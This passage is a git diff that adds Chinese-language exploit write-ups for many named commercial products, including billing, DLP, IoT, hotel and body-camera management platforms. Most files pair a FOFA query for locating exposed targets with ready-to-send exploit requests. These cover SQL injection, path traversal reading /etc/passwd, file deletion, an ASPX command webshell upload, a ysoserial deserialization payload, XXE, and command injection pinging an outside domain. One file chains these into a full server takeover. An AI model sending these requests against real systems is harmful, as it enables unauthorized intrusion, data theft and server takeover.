diff --git a/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md b/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md new file mode 100644 index 0000000..258816e --- /dev/null +++ b/蓝海卓越计费管理系统loaduser存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# 蓝海卓越 计费管理系统loaduser存在SQL注入漏洞 + +# 一、漏洞简介 +蓝海卓越计费管理系统loaduser存在SQL注入漏洞 + +# 二、影响版本 ++ 蓝海卓越 计费管理系统 + +# 三、资产测绘 ++ fofa`title=="蓝海卓越计费管理系统"` ++ 特征 + +![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/ZuWWFOBczG1cMdE2/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-863677.png) + +# 四、漏洞复现 +```plain +/ajax/loaduser.php?UserName=1 +``` + +直接sqlmap跑 + +![1716368373510-b0b02332-cdaa-484d-9bce-f89aae5681d2.png](./img/ZuWWFOBczG1cMdE2/1716368373510-b0b02332-cdaa-484d-9bce-f89aae5681d2-215575.png) + + + +> 更新: 2024-05-23 12:33:24 +> 原文: \ No newline at end of file diff --git a/蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md b/蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md new file mode 100644 index 0000000..dce0043 --- /dev/null +++ b/蓝海卓越计费管理系统picUpLoad存在任意文件删除漏洞.md 
@@ -0,0 +1,56 @@ +# 蓝海卓越 计费管理系统picUpLoad存在任意文件删除漏洞 + +# 一、漏洞简介 +蓝海卓越 计费管理系统picUpLoad存在任意文件删除漏洞 + +# 二、影响版本 ++ 蓝海卓越 计费管理系统 + +# 三、资产测绘 ++ fofa`title=="蓝海卓越计费管理系统"` ++ 特征 + +![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/oXQ_3ojiaYdjzEDT/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-714250.png) + +# 四、漏洞复现 +```plain +POST /inc/picUpFile.php?upFileFoler=&upFileID=&viewID= HTTP/1.1 +Host: +Content-Length: 1447494 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +DNT: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryehA9evlvumScbjSw +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 SE 2.X MetaSr 1.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=lp91fvnja6f987dj7jmkjh5601 +Connection: close + +------WebKitFormBoundaryehA9evlvumScbjSw +Content-Disposition: form-data; name="oldFileName" + +../../../../../usr/local/usr-gui/test.php +------WebKitFormBoundaryehA9evlvumScbjSw +Content-Disposition: form-data; name="file"; filename="c.jpg" +Content-Type: image/jpeg + +‰PNG + + +``` + +删除前 + +![1716390398206-8c468003-c696-4598-8722-1bf12f77f597.png](./img/oXQ_3ojiaYdjzEDT/1716390398206-8c468003-c696-4598-8722-1bf12f77f597-977713.png) + +![1716390672971-2ed1b251-e00c-421c-8d55-b9d57b0387b5.png](./img/oXQ_3ojiaYdjzEDT/1716390672971-2ed1b251-e00c-421c-8d55-b9d57b0387b5-466649.png) + +删除后 + +![1716390648320-9877848d-e0e0-4eb9-8161-04ed283e68ab.png](./img/oXQ_3ojiaYdjzEDT/1716390648320-9877848d-e0e0-4eb9-8161-04ed283e68ab-968201.png) + + + +> 更新: 2024-05-23 12:33:24 +> 原文: \ No newline at end of file diff --git a/蓝海卓越计费管理系统任意文件读取漏洞.md b/蓝海卓越计费管理系统任意文件读取漏洞.md new file mode 100644 index 0000000..db9a898 --- /dev/null +++ b/蓝海卓越计费管理系统任意文件读取漏洞.md 
@@ -0,0 +1,33 @@ +# 蓝海卓越计费管理系统任意文件读取漏洞 + +# 一、漏洞简介 +蓝海卓越计费管理系统存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件。 + +# 二、影响版本 ++ 蓝海卓越计费管理系统 + +# 三、资产测绘 ++ hunter`web.title=="蓝海卓越计费管理系统"` ++ 登录页面 + +![1693579717927-cbd94d05-0588-4dda-9e39-b1c7c482d113.png](./img/v_IBCSqew1UGaRIV/1693579717927-cbd94d05-0588-4dda-9e39-b1c7c482d113-430414.png) + +# 四、漏洞复现 +```java +GET /download.php?file=../../../../../etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=j19v1fshs6s3cvqff0k4l0kjn5 +Upgrade-Insecure-Requests: 1 +``` + +![1693579897849-1a707b06-bdb4-4e5f-853f-201ac2af36ad.png](./img/v_IBCSqew1UGaRIV/1693579897849-1a707b06-bdb4-4e5f-853f-201ac2af36ad-850295.png) + + + +> 更新: 2024-02-29 23:55:50 +> 原文: \ No newline at end of file diff --git a/蓝海卓越计费管理系统多漏洞导致getshell.md b/蓝海卓越计费管理系统多漏洞导致getshell.md new file mode 100644 index 0000000..5a12c87 --- /dev/null +++ b/蓝海卓越计费管理系统多漏洞导致getshell.md 
@@ -0,0 +1,110 @@ +# 蓝海卓越计费管理系统多漏洞导致getshell + +# 一、漏洞简介 + 蓝海卓越认证计费管理系统是一套以实现网络运营为基础,增强全局安全为中心,提高管理效率为目的的网络安全运营管理系统,提供“高安全、可运营、易管理”的运营管理体验,基于标准的RADIUS协议开发,它不仅支持PPPOE和WEB认证计费,还支持802.1X接入控制技术,与其他厂商支持相应标准的产品兼容,结合蓝海卓越的PPPOE服务器网关,可提供更加丰富的功能。,另外,友好的Web访问管理的方式,为用户提供更好用、易用的方式,更贴心的使用形式。蓝海卓越计费管理系统多漏洞导致getshell + +# 二、影响版本 ++ 蓝海卓越 计费管理系统 + +# 三、资产测绘 ++ fofa`title=="蓝海卓越计费管理系统"` ++ 特征 + +![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/qe1tkFLp9GezjB1g/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-253370.png) + +# 四、漏洞复现 +```plain +/ajax/loaduser.php?UserName=1 +``` + +通过注入跑出账号密码 + +![1716389345421-9e38d8dd-0c85-4c42-ac5d-d9fb1116d3a3.png](./img/qe1tkFLp9GezjB1g/1716389345421-9e38d8dd-0c85-4c42-ac5d-d9fb1116d3a3-823276.png) + +使用MD5解密出密码后登录系统 + +![1716389833186-8bbff4b6-dff5-46f8-855d-a6a901787035.png](./img/qe1tkFLp9GezjB1g/1716389833186-8bbff4b6-dff5-46f8-855d-a6a901787035-819521.png) + +![1716389848399-cb2cc634-200c-4818-be59-4381433c5a6b.png](./img/qe1tkFLp9GezjB1g/1716389848399-cb2cc634-200c-4818-be59-4381433c5a6b-844579.png) + +点击PORTAL模板下面的PORTAL模板管理,选择上传模板 + +![1716390460832-fd0d98ce-26e8-41ea-973e-95e1b6ae9522.png](./img/qe1tkFLp9GezjB1g/1716390460832-fd0d98ce-26e8-41ea-973e-95e1b6ae9522-847896.png) + +[root.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/29512878/1716438804359-a43f8695-df0c-4b28-83bc-e23064072257.zip) + +由于新版本系统的模板位置不在web路径下,所以需要穿越模板路径 + +Web绝对路径: + +```plain +/usr/local/usr-gui/ +``` + +模板路径: + +```plain +/mnt/mysql/usr/local/portal/themes/20240519093115_xxx/ +``` + +制作一个如下的压缩包: + +![1716389926031-814570a6-da10-4a06-ab0b-d76d6c891411.png](./img/qe1tkFLp9GezjB1g/1716389926031-814570a6-da10-4a06-ab0b-d76d6c891411-903276.png) + +test.php内容为:字符编码必须为Unix(LF) + +```plain +#!/bin/php + +``` + +![1716390048945-ca864ffe-6e01-4bb6-8592-e78b6a92518e.png](./img/qe1tkFLp9GezjB1g/1716390048945-ca864ffe-6e01-4bb6-8592-e78b6a92518e-619177.png) + + + +上传zip压缩包 + 
+![1716390233650-ab77d4c6-3b4f-47a0-a7ae-3118efd6819f.png](./img/qe1tkFLp9GezjB1g/1716390233650-ab77d4c6-3b4f-47a0-a7ae-3118efd6819f-134490.png) + +Shell位置为: + +```plain +/test.php +``` + +但是访问时会提示: + +![1716390275360-c5689377-8edc-4977-a8dd-7f3449abc878.png](./img/qe1tkFLp9GezjB1g/1716390275360-c5689377-8edc-4977-a8dd-7f3449abc878-072747.png) + +接下来就需要使用后台命令执行漏洞进行权限赋予: + +```plain +GET /ajax_check.php?portaltheme_del_id=4&portaltheme_del_dir=%2Fmnt%2Fmysql%2Fusr%2Flocal%2Fportal%2Fthemes%2F20210519093903_738%2F|chmod+755+/usr/local/usr-gui/test.php HTTP/1.1 +Host: +Accept: */* +DNT: 1 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0 +Referer: http://124.114.151.106:8880/portaltheme_list.php +Accept-Language: zh-CN,zh;q=0.9 +Cookie: mylang=zh_s; PHPSESSID=lp91fvnja6f987dj7jmkjh5601 +Connection: close + +``` + +![1716390344536-d72391d6-2178-4dfa-ac0e-72962047e530.png](./img/qe1tkFLp9GezjB1g/1716390344536-d72391d6-2178-4dfa-ac0e-72962047e530-418615.png) + +之后再次访问 + +```plain +/test.php +``` + +![1716390374521-ebe7f986-e300-4ac6-8b2a-d9e26cf8f674.png](./img/qe1tkFLp9GezjB1g/1716390374521-ebe7f986-e300-4ac6-8b2a-d9e26cf8f674-878726.png) + + + +> 更新: 2024-05-23 12:33:24 +> 原文: \ No newline at end of file diff --git a/蓝海卓越计费管理系统存在弱口令漏洞.md b/蓝海卓越计费管理系统存在弱口令漏洞.md new file mode 100644 index 0000000..cef99cd --- /dev/null +++ b/蓝海卓越计费管理系统存在弱口令漏洞.md 
@@ -0,0 +1,25 @@ +# 蓝海卓越计费管理系统存在弱口令漏洞 + +# 一、漏洞简介 +蓝海卓越计费管理系统存在弱口令漏洞 + +# 二、影响版本 ++ 蓝海卓越计费管理系统 + +# 三、资产测绘 ++ fofa`title=="蓝海卓越计费管理系统"` ++ 特征 + +![1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9.png](./img/pHk6xkjRFchHBF2G/1716136162798-aa34ed6f-ea20-43f2-99a7-dba6a1e626c9-282120.png) + +# 四、漏洞复现 +```plain +admin/admin +``` + +![1716367345268-dc069ed1-5306-4921-adc4-9681586da950.png](./img/pHk6xkjRFchHBF2G/1716367345268-dc069ed1-5306-4921-adc4-9681586da950-239153.png) + + + +> 更新: 2024-05-23 12:33:24 +> 原文: \ No newline at end of file diff --git a/虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md b/虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md new file mode 100644 index 0000000..cc0813f --- /dev/null +++ b/虚拟币买卖USDT场外交易所upload.do存在任意文件上传.md 
@@ -0,0 +1,42 @@ +# 虚拟币买卖USDT场外交易所upload.do存在任意文件上传 + +虚拟币买卖USDT场外交易所由于在鉴权方面存在疏漏,导致了可未授权访问,从而通过upload.do接口进行任意文件上传。 + +## fofa + +```javascript +body="/static/weui/css/wkb.css" +``` + +## poc + +```javascript +POST /member/index/upload.do HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 197 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZcxuMaQ4IflRnJgy +Cookie: Hm_lvt_f4b3788b2247dd149fb7fdffe8aece79=1717334200; _ga=GA1.1.64233863.1717334200; PHPSESSID=8t16e4ahe761qikg272s6jhsi0 +Host: 127.0.0.1:81 +Origin: http://127.0.0.1:81 +Referer: http://127.0.0.1:81/member/index/upload.do +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" + +------WebKitFormBoundary03rNBzFMIytvpWhy +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + + +------WebKitFormBoundary03rNBzFMIytvpWhy-- +``` +路径返回包中 diff --git a/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md b/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md new file mode 100644 index 0000000..acb8e22 --- /dev/null +++ b/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +# 虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞 + +虹安Heimdall DLP数据泄漏防护系统 pushSetup.do 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +body="userReg/initUserReg.do" +``` + +## poc +```javascript +POST /dlp/userReg/pushSetup.do HTTP/1.1 +Host: +Priority: u=4 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + +setupName={{urlescape(1' AND (SELECT 6789 FROM (SELECT(SLEEP(5)))nxdq) AND 'vpUG'='vpUG)}} +``` + +![image-20241227223225696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272232761.png) \ No newline at end of file diff --git a/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md b/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md new file mode 100644 index 0000000..4b890d5 --- /dev/null +++ b/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md @@ -0,0 +1,18 @@ +# 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞 + +蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## fofa + +```javascript +"fastbee" +``` + +## poc + +```javascript +GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate, br +``` + diff --git a/西联软件移动门店管理系统treamToFile文件上传漏洞.md b/西联软件移动门店管理系统treamToFile文件上传漏洞.md new file mode 100644 index 0000000..71359c4 --- /dev/null +++ b/西联软件移动门店管理系统treamToFile文件上传漏洞.md 
@@ -0,0 +1,59 @@ +# 西联软件移动门店管理系统treamToFile文件上传漏洞 + +西联软件-移动门店管理系统 StreamToFile 接口存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa +```javascript +body="西联软件提供云计算服务" +``` + +## poc +```javascript +POST /api/UploadDB/StreamToFile HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj +Accept: */* +Connection: close + +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="organ" + +qwert +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="devid" + +yuiop +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="files";filename="1.aspx" +Content-Type: image/png + +<%@ Page Language="Jscript" validateRequest="false" %> +<% +var c=new System.Diagnostics.ProcessStartInfo("cmd"); +var e=new System.Diagnostics.Process(); +var out:System.IO.StreamReader,EI:System.IO.StreamReader; +c.UseShellExecute=false; +c.RedirectStandardOutput=true; +c.RedirectStandardError=true; +e.StartInfo=c; +c.Arguments="/c " + Request.Item["cmd"]; +e.Start(); +out=e.StandardOutput; +EI=e.StandardError; +e.Close(); +Response.Write(out.ReadToEnd() + EI.ReadToEnd()); +System.IO.File.Delete(Request.PhysicalPath); +Response.End();%> +------WebKitFormBoundaryFfJZ4PlAZBixjELj-- +``` + +![image-20241227221622454](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272216534.png) + +文件路径 + +``` +/Files/DB/qwert_yuiop.aspx?cmd=dir +``` + diff --git a/西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md b/西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md new file mode 100644 index 0000000..c094f1c --- /dev/null +++ b/西软云XMSFoxLookupInvoker接口存在反序列化漏洞.md 
@@ -0,0 +1,47 @@ +# 西软云XMS FoxLookupInvoker接口存在反序列化漏洞 + +# 一、漏洞简介 +西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。2020的开年突变,对酒店行业来讲,无疑是天降横祸。覆巢之下,焉有完卵,对酒店管理系统企业来说,则是增量市场的红利几乎消失,所有品牌都得在存量市场里搏杀,生存和创新,是2020年的头号命题。西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。 + +# 二、影响版本 ++ 西软云XMS + +# 三、资产测绘 ++ fofa`app="shiji-西软云XMS"` ++ 特征 + +![1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8.png](./img/zWTMpvX2S5KgVWD4/1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8-052359.png) + +# 四、漏洞复现 +1. 生成`CommonsBeanutils183NOCC`回显链 + +[ysoserial-0.0.6-SNAPSHOT-all.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1713623246544-1ecb25a1-5dcc-450d-9ea1-067408bc9cc8.jar) + +```plain +java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils183NOCC "CLASS:TomcatCmdEcho" | base64 +``` + +```plain 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 +``` + +2. poc + +```plain +POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Connection: close +cmd: echo stctest + +{{base64dec(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)}} +``` + +![1711819619027-a00a9ef4-4d79-4866-8f12-ffe12fd1560e.png](./img/zWTMpvX2S5KgVWD4/1711819619027-a00a9ef4-4d79-4866-8f12-ffe12fd1560e-452415.png) + +[xiruanyun-FoxLookupInvoker-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713623246705-9591bb8e-2a1c-46c7-8adc-8448de2e0d9b.yaml) + + + +> 更新: 2024-04-20 22:27:26 +> 原文: \ No newline at end of file diff --git a/西软云XMSoperate接口存在XXE漏洞.md b/西软云XMSoperate接口存在XXE漏洞.md new file mode 100644 index 0000000..454850f --- /dev/null +++ b/西软云XMSoperate接口存在XXE漏洞.md 
@@ -0,0 +1,33 @@ +# 西软云XMS operate接口存在XXE漏洞 + +# 一、漏洞简介 +西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。2020的开年突变,对酒店行业来讲,无疑是天降横祸。覆巢之下,焉有完卵,对酒店管理系统企业来说,则是增量市场的红利几乎消失,所有品牌都得在存量市场里搏杀,生存和创新,是2020年的头号命题。西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。 + +# 二、影响版本 ++ 西软云XMS + +# 三、资产测绘 ++ fofa`app="shiji-西软云XMS"` ++ 特征 + +![1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8.png](./img/9I5b4qVYQjvHjf2I/1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8-622096.png) + +# 四、漏洞复现 +```plain +POST /XopServerRS/rest/futurehotel/operate HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36 +Content-Length: 79 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: text/xml + + %remote;]> +``` + +![1711817615653-a87b144a-a77e-4cf1-b296-a5ff885a353e.png](./img/9I5b4qVYQjvHjf2I/1711817615653-a87b144a-a77e-4cf1-b296-a5ff885a353e-517502.png) + + + +> 更新: 2024-04-20 22:27:26 +> 原文: \ No newline at end of file diff --git a/誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md b/誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md new file mode 100644 index 0000000..358650f --- /dev/null +++ b/誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# 誉龙数字执法记录仪管理平台 FindById存在SQL注入漏洞 + +# 一、漏洞简介 +誉龙数字执法记录仪管理平台是深圳誉龙数字技术有限公司开发的执法记录仪管理平台,誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +# 二、影响版本 ++ 誉龙数字执法记录仪管理平台 + +# 三、资产测绘 ++ fofa`body="PView 视音频管理平台"` ++ 特征 + +![1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3.png](./img/VYcOtKaJIFf_m5Yn/1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3-787765.png) + +# 四、漏洞复现 +```go +POST /index.php?r=RelMedia/FindById HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+ +``` + +![1726620841847-a47e8ed7-a3db-496f-a0d2-b1c430c144b2.png](./img/VYcOtKaJIFf_m5Yn/1726620841847-a47e8ed7-a3db-496f-a0d2-b1c430c144b2-977199.png) + + + +> 更新: 2024-10-22 09:36:10 +> 原文: \ No newline at end of file diff --git a/誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md b/誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md new file mode 100644 index 0000000..849e43f --- /dev/null +++ b/誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md 
@@ -0,0 +1,34 @@ +# 誉龙数字执法记录仪管理平台 TimeSyn 远程命令执行 + +# 一、漏洞简介 +誉龙数字执法记录仪管理平台是深圳誉龙数字技术有限公司开发的执法记录仪管理平台,该平台存在远程命令执行漏洞,攻击者可以利用该漏洞执行任意命令,这可能导致对系统进行未经授权的操作,例如创建、修改或删除文件、执行系统命令、安装恶意软件等。 + +# 二、影响版本 ++ 誉龙数字执法记录仪管理平台 + +# 三、资产测绘 ++ fofa`body="PView 视音频管理平台"` ++ 特征 + +![1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3.png](./img/Z2u3bzlmVxpGXETB/1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3-660762.png) + +# 四、漏洞复现 +```go +POST /index.php?r=Third/TimeSyn HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Host: +Cookie: JSESSIONID=AB3CC11444E566879F70BE78C0C518CA +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 96 + +cloudKey=0x0&date=|cmd.exe+/c+ping jzogguorui.dgrh3.cn&time=1 +``` + +![1726295898690-b6f838cb-5df3-42e7-810e-04a9292c7545.png](./img/Z2u3bzlmVxpGXETB/1726295898690-b6f838cb-5df3-42e7-810e-04a9292c7545-933245.png) + + + +> 更新: 2024-10-22 09:36:10 +> 原文: \ No newline at end of file diff --git a/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md b/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md new file mode 100644 index 0000000..fca1010 --- /dev/null +++ b/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +# 誉龙视音频综合管理平台FindById存在SQL注入漏洞 + +誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞,未经身份验证的远程攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="PView 视音频管理平台" +``` + +## poc + +```javascript +POST /index.php?r=RelMedia/FindById HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+ +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162102180.png) + 
diff --git a/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md b/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md new file mode 100644 index 0000000..ecd414a --- /dev/null +++ b/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md @@ -0,0 +1,25 @@ +# 誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞 + +誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞,未经身份验证的远程攻击者在目标服务器上执行任意系统命令,可能导致服务器被完全控制、数据泄露或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="PView 视音频管理平台" +``` + +## poc + +```javascript +POST /index.php?r=Third/TimeSyn HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +cloudKey=0x0&date=|cmd.exe+/c+whoami+>+1.txt&time=1 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162103838.png) \ No newline at end of file diff --git a/证书查询系统存在任意文件读取漏洞.md b/证书查询系统存在任意文件读取漏洞.md new file mode 100644 index 0000000..75ded8a --- /dev/null +++ b/证书查询系统存在任意文件读取漏洞.md @@ -0,0 +1,27 @@ +# 证书查询系统存在任意文件读取漏洞 + +# 一、漏洞简介 +证书查询系统存在任意文件读取漏洞 + +# 二、影响版本 ++ 餐厅数字化综合管理平台 + +# 三、资产测绘 ++ fofa`"/index/js/jquery.uls.data.js'"` + +![1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37.png](./img/RJ349Ot7eGo3wrZl/1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37-929281.png) + +# 四、漏洞复现 +```java +GET /index/ajax/lang?lang=../../application/database HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +``` + +![1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7.png](./img/RJ349Ot7eGo3wrZl/1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7-454699.png) + + + +> 更新: 2024-08-12 17:15:58 +> 原文: \ No newline at end of file diff --git a/购物商城系统commodtiy存在任意SQL注入漏洞.md b/购物商城系统commodtiy存在任意SQL注入漏洞.md new file mode 100644 index 0000000..b6375db --- /dev/null 
